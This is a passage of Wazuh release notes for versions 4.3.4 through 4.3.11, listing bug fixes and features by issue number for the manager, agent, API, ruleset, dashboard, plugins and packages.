Fixed duplicate error message IDs in the log.

#12691

Fixed compilation warnings in the agent.

#12147

Fixed the skip_on_error parameter of the AWS integration module, which was set to True by default.

#12381

Fixed AWS DB maintenance with Load Balancer Buckets.

#12650

Fixed AWS integration's test_config_format_created_date unit test.

#12630

Fixed created_date field for LB and Umbrella integrations.

#13185

Fixed AWS integration database maintenance error management.

#13674

The default delay at GitHub integration has been increased to 30 seconds.

#14706

Logcollector has been fixed to allow locations containing colons (:).

#13835

Fixed system architecture reporting in Syscollector on Apple Silicon devices.

#14190

The C++ standard library and the GCC runtime library are now included with Wazuh.

#13877

Fixed missing inventory cleaning message in Syscollector.

#15322

Fixed WPK upgrade issue on Windows agents due to process locking.

#13044

Fixed FIM injection vulnerability when using prefilter_cmd option.

#14525

Fixed the parse of ALB logs splitting client_port, target_port and target_port_list in separated ip and port for each key.

#15335

Fixed a bug that prevents processing Macie logs with problematic ipGeolocation values.

#15584

Fixed GCP integration module error messages.

#15575

Fixed an error that prevented the agent on Windows from stopping correctly.

#16140

Fixed Azure integration credentials link.

RESTful API

Reference

Description

#12302

Fixed copy functions used for the backup files and upload endpoints to prevent incorrect metadata.

#11010

Fixed a bug regarding ids not being sorted with cluster disabled in Active Response and Agent endpoints.

#10736

Fixed a bug where null values from wazuh-db were returned in API responses.

#12063

Connections through WazuhQueue will be closed gracefully in all situations.

#12450

Fixed exception handling when trying to get the active configuration of a valid but not configured component.

#12700

Fixed api.yaml path suggested as remediation at exception.py.

#12768

Fixed /tmp access error in containers of API integration tests environment.

#13096

The API will return an exception when the user asks for agent inventory information, and there is no database for it (never connected agents).

#13171 #13386

Improved regex used for the q parameter on API requests with special characters and brackets.

#12592

Removed board_serial from syscollector integration tests expected responses.

#12557

Removed cmd field from expected responses of syscollector integration tests.

#12611

Reduced the maximum number of groups per agent to 128 and adjusted group name validation.

#14204

Reduced amount of memory required to read CDB lists using the API.

#14237

Fixed a bug where the cluster health check endpoint and CLI would add an extra active agent to the master node.

#15311

Fixed bug that prevents updating the configuration when using various <ossec_conf> blocks from the API.

#15194

Fixed vulnerability API integration tests' healthcheck.

Ruleset

Reference

Description

#11613

Fixed OpenWRT decoder fixed to parse UFW logs.

#14807

Bug fix in wazuh-api-fields decoder.

#13567

Fixed deprecated MITRE tags in rules.

#15241

SCA checks IDs are not unique.

#14513

Fixed regex in check 5.1.1 of Ubuntu 20.04 SCA.

#15251

Removed wrong Fedora Linux SCA default policies.

#15156

SUSE Linux Enterprise 15 SCA Policy duplicated check ids 7521 and 7522.

Other

Reference

Description

#14165

Fixed Makefile to detect CPU architecture on Gentoo Linux.

Wazuh dashboard

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the wizard deploy agent.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4638 #5046

Fixed a bug that caused the flyouts to close when clicking inside them.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats.

#4962

Fixed commands in the deploy new agent section(most of the commands are missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4942

Fixed agent graph in OpenSearch dashboard.

#4984

Fixed commands in the deploy new agent section(most of the commands are missing -1).

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A solaris command has been fixed.

#5045

Fixed commands: AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX, Oracle Linux 5, Amazon Linux 2, CentOS 5. Changed the word or higher in buttons to +.Fixed validations for HP-UX, Solaris and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5092

Fixed menu content panel is displayed in the wrong place.

#5101

Fixed greyed and disabled menu section names.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5167

Fixed the module information button in Office365 and Github Panel tab to open the nav drawer.

#5200

Fixed a UI crash due to external_references field could be missing in some vulnerability data.

#5273

Fixed the Wazuh main menu is not displayed when the navigation menu is locked.

#5286

The event view is now working correctly after fixing a problem that occurred when Lucene language was selected in the search bar.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the wizard deploy agent.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats.

#4962

Fixed commands in the deploy new agent section(most of the commands are missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4999

Fixed Inventory checks table filters by stats.

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A Solaris command has been fixed.

#5045

Fixed commands: AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX,Oracle Linux 5, Amazon Linux 2, CentOS 5. Changed the word or higher in buttons to +.Fixed validations for HP-UX, Solaris and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5200

Fixed a UI crash due to external_references field could be missing in some vulnerability data.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428 #4925

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the wizard deploy agent.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4832 #4838

Fixed the agents wizard OS styles and their versions.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats #4999 #5031

#4962

Fixed commands in the deploy new agent section(most of the commands are missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4999

Fixed Inventory checks table filters by stats.

#4983

Fixed agent installation command for macOS in the deploy new agent section.

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A Solaris command has been fixed.

#5045

Fixed commands: AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX, Oracle Linux 5, Amazon Linux 2, CentOS 5. Changed the word or higher in buttons to +.Fixed validations for HP-UX, Solaris and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5200

Fixed a UI crash due to external_references field could be missing in some vulnerability data.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Packages

Reference

Description

#1091

Updated g++ to fix an undefined behavior on openSUSE Tumbleweed.

#976

Added the missing tar dependency in the Wazuh installation assistant.

#1196

Fixed the RPM wazuh-agent package build.

#1431

Fixed a compilation error on CentOS 5 and CentOS 7, as well as the building of the Docker images for CentOS 5 on the i386 architecture.

#1611

Fixed the Solaris 11 generation branch.

#1653

Fixed the log cleaning command in the OVA generation.

#1661

Fixed the invoke.rc call.

#1674

Fixed RHEL9 init.d file installation.

#1675

Fixed RHEL9 sysv-init error.

#1650

Fixed the package building for Arch Linux.

#1688

Updated the generate_ova.sh script.

#2019

Removed error logs from the OVA.

#1905

Fixed service enablement in SUSE packages.

#1877

Fixed package conflicts between the wazuh-manager and azure-cli on CentOS 8.

#1779

Fixed the Wazuh installation assistant all-in-one deployment on Fedora 36.

#1812

Fixed the RHEL and CentOS SCA template generation.

#1826

Fixed the wazuh-certs-tool.sh behavior when the given command does not match the content of the config.yml file.

#1824

Added daemon-reload at the end of the rollback function.

#1836

Fixed the Wazuh offline installation messages.

#1898

Removed Wazuh dashboard and Wazuh indexer init.d service for RHEL9.

#1925

Removed a black square icon from the Wazuh dashboard.

#1963

An issue that didn't allow the Wazuh installation assistant to create certificates for more than 9 nodes is now fixed.

#1987

Removed the init.d service for Wazuh dashboard RPM.

#1983

requestHeadersWhitelist is deprecated and has been replaced by requestHeadersAllowlist.

#1986

The Wazuh installation assistant now shows a message indicating that the Wazuh indexer was removed.

#2018

Disabled the expanded header by default in the Wazuh dashboard.

#1932

Added flag mechanism to configure the protection for untrusted libraries verification.

#1727

Added a fix to avoid GLIBC crash.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.11 Release notes - 24 April 2023

This section lists the changes in version 4.3.11. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#16752

Fixed a dead code bug that might cause wazuh-db to crash.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.10 Release notes - 16 November 2022

This section lists the changes in version 4.3.10. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#15219

The Arch Linux feed URL in Vulnerability Detector is updated.

#15197

A bug in Vulnerability Detector related to the internal database access is fixed.

#15303

A crash hazard in Analysisd when parsing an invalid <if_sid> value in the ruleset is now fixed.

Wazuh agent

Reference

Description

#15259

The agent upgrade configuration has been restricted to local settings.

#15262

An unwanted Windows agent configuration modification on upgrade is fixed.

Wazuh dashboard

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Packages

Reference

Description

#1901

Improved the config.yml template to prevent indentation issues.

#1910

Fixed the clean function in the WPK generation.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.9 Release notes - 13 October 2022

This section lists the changes in version 4.3.9. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #14497 An obsolete Windows Audit SCA policy file is removed.

Wazuh Kibana plugin
  • Support for Kibana 7.17.6.

Wazuh Splunk app
  • Support for Splunk 8.2.7.1 and 8.2.8.

Other
  • #15067 The external protobuf Python dependency is updated to 3.19.6.

Resolved issues

This release resolves known issues as the following:

Wazuh agent

Reference

Description

#15007

The remote policy detection in SCA is fixed.

#15023

Fixed the agent upgrade module settings parser. Now a default CA file is set.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.8 Release notes - 19 September 2022

This section lists the changes in version 4.3.8. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #14842 Updated the WPK upgrade root CA certificate.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#14752

A wrong field assignation in Audit decoders is now fixed.

#14825

A performance problem when synchronizing files through the cluster is fixed. The multigroup folder in worker nodes is no longer cleaned upon node restart.

#14772

A problem when using an invalid syntax with the if_sid label is fixed. Now the rule is ignored if the listed if_sid rules are not separated by spaces or commas.

Wazuh agent

Reference

Description

#14801

A path traversal flaw in Active Response affecting agents from v3.6.1 to v4.3.7 is fixed. Thanks to Roshan Guragain for reporting this vulnerability.

Packages

Reference

Description

#1798

Improved error management and IP values extraction function in the wazuh-certs-tool.sh.

#1806

An error while changing the password in the Wazuh dashboard configuration using wazuh-install.sh is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.7 Release notes - 24 August 2022

This section lists the changes in version 4.3.7. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #14540 A cluster command to obtain custom ruleset files and their hash is added.

Wazuh agent
  • #13958 The logs of the Office365 integration module are improved.

RESTful API
  • #14551 The endpoint GET /cluster/ruleset/synchronization to check the status of the synchronization of the ruleset in a cluster is added.

  • #14208 The performance of framework functions for MITRE API endpoints is improved.

Ruleset
  • #13806 An SCA Policy for CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 is added.

  • #13879 The SCA Policy for CIS Microsoft Windows 10 Enterprise is updated with the benchmark v1.12.0 for the release 21H2.

  • #13843 An SCA policy for Red Hat Enterprise Linux 9 (RHEL9) is added.

  • #13899 An SCA policy for CIS Microsoft Windows Server 2022 Benchmark 1.0.0 is added.

Wazuh dashboard
  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4350 The deprecated manager_host field in Wazuh API responses about agent information is no longer used.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.3.7.

Packages
  • #1737 passwords-tool tests are added with the files passwords-tool.yml and tests-stack.sh.

  • #1742 A port status check is added to the Wazuh installation assistant to avoid the installation ending up in failure if one of the Wazuh default ports is being used.

  • #1754 Skipping the OS check of the wazuh-install.sh script when downloading files is added.

  • #1629 The -tmp option is added to the the wazuh-certs-tool script in order to specify the tmp directory.

  • #1685 The RHEL 9 SCA files are added to the specs.

  • #1734 All Zypper references are removed from the unattended and test directories.

  • #1753 TLS versions lower than v1.2 are disabled to avoid using weak cipher suites.

  • #1641 Removed the revision variables from the Wazuh installation assistant.

  • #1750 The OVA generation scripts are modified to adapt them to the newest changes in wazuh-passwords-tool.sh.

  • #1769 The path when copying Fedora SCA files is fixed with the new versions.

RPM revision 2
  • v4.3.7-2 A bug related to the installation of the SCA policy in RHEL8 is fixed. This error caused the RHEL 9 SCA policy to be installed in RHEL 8 machines instead of the correct one.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#13956

A bug in Analysisd that may make it crash when decoding regexes with more than 14 subpatterns is fixed.

#14366

The risk of a crash when Vulnerability Detector parses OVAL feeds is fixed.

#14436

A busy-looping in wazuh-maild when monitoring alerts.json is fixed.

#14417

A segmentation fault in wazuh-maild when parsing alerts exceeding the nesting limit is fixed.

Wazuh agent

Reference

Description

#14368

A code defect in the GitHub integration module reported by Coverity is fixed.

#14518

An undefined behavior in the agent unit tests is fixed.

Ruleset

Reference

Description

#14513

A bug found in the regular expression used for check 5.1.1 (ID 19137) of the Ubuntu 20 SCA policy file that caused false positives is fixed.

#14483

An error when a Wazuh agent runs an AWS Amazon Linux SCA policy is fixed.

#13950

Amazon Linux 2 SCA policy is modified to resolve rules and conditions on control 1.5.2.

#14481

Missing SCA files are added to the Wazuh manager installation.

#14678

OS detection in Ubuntu 20.04 LTS SCA policy is now fixed.

Wazuh dashboard

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

Module settings not persisting between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

The persistence of the plugin registry file between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4378

Link to web documentation and some grammatical errors in the file wazuh.yml are fixed. Also, the in-file documentation is improved.

#4399

The config-equivalences file is moved to the common folder to make it available for the entire application.

#4350

An error during the generation of a group's report, if the request to the Wazuh API fails, is fixed.

#4350

A problem with the group's report, when the group has no agents, is fixed.

#4352

A path in the logo customization section is fixed.

#4362

A TypeError in a resource that fails in Chrome and Firefox browsers is fixed.

#4358

An error creating PDF reports when using Kibana with X-Pack without authentication context is fixed.

#4359

Module settings not persisting between updates is fixed.

#4367

A search bar error on the SCA Inventory table is fixed.

#4373

A routing loop when reinstalling the Wazuh indexer is fixed.

Wazuh Splunk app

Reference

Description

#1359

The API console suggestions were not working in version 4.3.6 and are now fixed.

Packages

Reference

Description

#1762

The Wazuh GPG key is now removed when uninstalling all the Wazuh components using the installation assistant.

#1765

Handling of errors that might happen when downloading Filebeat files is added.

#1766

A check of the indentation of the config.yml file is added.

#1731

An error when installing every component of a distributed installation in the same host using the 127.0.0.1 IP address is fixed.

#1619

The code of the Wazuh installation assistant has been improved.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.6 Release notes - 20 July 2022

This section lists the changes in version 4.3.6. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #14085 Support for Ubuntu 22 (Jammy) is added in Vulnerability Detector.

  • #14117 Support for Red Hat 9 is added in Vulnerability Detector.

  • #14111 The shared configuration file handling performance is improved in wazuh-remoted.

Wazuh agent
  • #13837 The macOS codename list is updated in Syscollector.

  • #14093 The GitHub and Office365 integrations log messages are improved.

Ruleset
  • #13893 Ubuntu Linux 22.04 SCA policy is added.

  • #13905 Apple macOS 12.0 Monterey SCA policy is added.

Wazuh Splunk app
  • #1351 The documentation links are updated to match their respective title on the Wazuh documentation page.

  • #1354 The use of all tags to filter Wazuh Server logs is re-allowed.

Packages
  • #1706 The text of the password tool help option is improved.

  • #1696 The passwords.wazuh file is renamed to wazuh-passwords.txt.

  • #1697 Wazuh dashboard users wazuh_admin and wazuh_user and roles wazuh_ui_user and wazuh_ui_admin are removed from the installation templates.

  • #1718 The periodic Filebeat metrics are disabled.

  • #1683 New Darwin 21 SCA file for macOS 12 added.

  • #1684 New Ubuntu 22 SCA file added.

Other
  • #14121 The Filebeat logging metrics are disabled.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#14098

The potential memory leaks in Vulnerability Detector when parsing OVAL with no criteria are fixed.

#13957

A bug in Vulnerability Detector that skipped Windows 8.1 and Windows 8 agents is fixed.

#14061

A bug in wazuh-db that stored duplicate Syscollector package data is fixed.

Wazuh agent

Reference

Description

#13941

The agent shutdown when syncing Syscollector data is fixed.

#14207

A bug in the agent installer that incorrectly detected the Wazuh username is fixed.

#14100

The macOS vendor data retrieval in Syscollector is fixed.

#14106

A bug in the Syscollector data sync when the agent gets disconnected is fixed.

#13980

A crash in the Windows agent caused by the Syscollector SMBIOS parser for Windows agents is fixed.

RESTful API

Reference

Description

#14152

The return of an exception when the user asks for agent inventory information where there is no database for it is fixed, such as never_connected agents.

Wazuh dashboard

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link in the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link in the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4326

An error distinguishing conjunction operators (AND, OR) in the search bar component is fixed.

#4301

Some link titles are changed to match their documentation section title.

#4301

Missing documentation references to the Agent's overview, Agent's Integrity monitoring, and Agent's Inventory data sections, when the agent has never connected are fixed.

#4301

The links to the web documentation are changed and now point to the plugin short version instead of current.

#4301

Missing documentation link to the Docker Listener module is fixed.

#4301

Some links to web documentation that didn't work are fixed.

#4307

Now, errors on the action buttons of Rules/Decoders/CDB Lists' tables are displayed.

#4330

Changed reports inputs and usernames.

Wazuh Splunk app

Reference

Description

#1351

Some links to web documentation that didn't work are fixed.

#1296

An error on the DevTools where the payload was not being sent, that caused the request to fail is fixed.

Packages

Reference

Description

#1713

An error when upgrading using symlinks is fixed.

#1721

An error with the installation assistant API in single Wazuh manager nodes is fixed.

#1726

A problem with Filebeat found in systems using GLIBC is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.5 Release notes - 29 June 2022

This section lists the changes in version 4.3.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #13915 The Vulnerability Detector log is improved for the case when the agent OS data is unavailable.

Wazuh agent
  • #13749 Package data support is extended in Syscollector for modern RPM agents.

  • #13898 Verbosity of the GitHub module logs is improved.

Ruleset
  • #13567 Deprecated MITRE tags in rules are removed.

Wazuh dashboard
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4244 When a user goes to test a new rule in Tools / Ruleset Test, there were API messages that were not displayed. Now, this issue is fixed and the messages are displayed on the screen.

  • #4261 An authorization prompt is added in MITRE > Intelligence.

  • #4239 The reference from Manager is changed to the Wazuh server in the Deploy new agent guide.

  • #4267 The filtered tags are removed because they were not supported by the API endpoint.

  • #4254 The styles in visualizations are changed.

Wazuh Splunk app
  • #1292 The status Pending to the Agents sections is added.

  • #1276 A disabled state to the Apply changes button on the Agents group editor is added when no changes on the group are made.

Packages
  • #1635 Removed dependencies from the wazuh-indexer package.

  • #1663 Improved how the password tool changes the API passwords.

Other
  • #13811 The test_agent_PUT_endpoints.tavern.yaml API integration test failure in numbered branches is fixed.

  • #13790 The external click and clickclick Python dependencies are upgraded to 8.1.3 and 20.10.2 respectively.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#13662

The upgrade module response message has been fixed not to include null values.

#13863

A string truncation warning log in wazuh-authd when enabling password authentication is fixed.

#13587

A memory leak in wazuh-analysisd when overwriting a rule multiple times is fixed.

#13907

The wazuh-agentd and client-auth are prevented from performing enrollment if the agent fails to validate the manager certificate.

#13694

The manager compilation when enabling GeoIP support is fixed.

#13883

A crash in wazuh-modulesd when getting stopped while downloading a Vulnerability Detector feed is fixed.

Wazuh agent

Reference

Description

#13606

Agent auto-restart on shared configuration changes when running on containerized environments is fixed.

#13880

An issue when attempting to run the DockerListener integration using Python 3.6 and having the Docker service stopped is fixed.

RESTful API

Reference

Description

#13867

The tag parameter of GET /manager/logs and GET /cluster/{node_id}/logs endpoints is updated to accept any string.

Ruleset

Reference

Description

#13597

Fixed Eventchannel testing and improved reporting capabilities of the runtest tool.

#13781

The Amazon Linux 2 SCA policy is modified to resolve a typo on control 1.1.22 and EMPTY_LINE conditions.

#13950

The Amazon Linux 2 SCA policy is modified to resolve the rule and condition on control 1.5.2.

Wazuh dashboard

Reference

Description

#4233

Type error when changing screen size in agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail on the creation of the index because it already exists, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to API not available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration on manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4233

Type error when changing screen size in agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail on the creation of the index because it already exists, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to API not available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration on manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4233

Type error when changing screen size in agents section is fixed.

#4235

A logged error that appeared when the statistics tasks tried to create an index with the same name, causing the second task to fail on the creation of the index because it already exists, is removed.

#4237

A UI crash due to a query with syntax errors in Modules/Security events is fixed.

#4240

An error when generating a module report after changing the selected agent is fixed.

#4266

An unhandled error when a Wazuh API request failed in the dev tools is fixed.

#4264

An error related to API not available when saving the manager configuration and restarting the manager from Management/Configuration/Edit configuration on manager mode is fixed.

#4253

A UI problem that required scrolling to see the logs in Management/Logs and Settings/Logs is fixed.

Wazuh Splunk app

Reference

Description

#1290

Outdated documentation links have been updated.

#1343

The Alerts view from the MITRE section has been hardened in case of errors during the requests to the API (for example timeouts).

Packages

Reference

Description

#1673

The error with the installation of the file init.d to enable Wazuh service in RHEL 9 systems is fixed.

#1675

The error with the installation of the file sysv-init to enable Wazuh service in RHEL 9 systems is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.4 Release notes - 8 June 2022

This section lists the changes in version 4.3.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh manager
  • #13437 Integratord now tries to read alerts indefinitely, instead of performing 3 attempts.

  • #13626 A timeout for remote queries made by the Office 365, GitHub, and Agent Update modules is added.

Wazuh dashboard
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

  • #4166 The visualization of Status panel in Agents is replaced.

  • #4166 The visualization of policy in Modules/Security configuration assessment/Inventory is replaced.

  • #4166 #4199 Consistency is improved in the colors and labels used for the agent status.

  • #4169 How the full and partial scan dates are displayed in the Details panel of Vulnerabilities/Inventory is replaced.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4166 #4188 The pending agent status is added to some sections where it was missing.

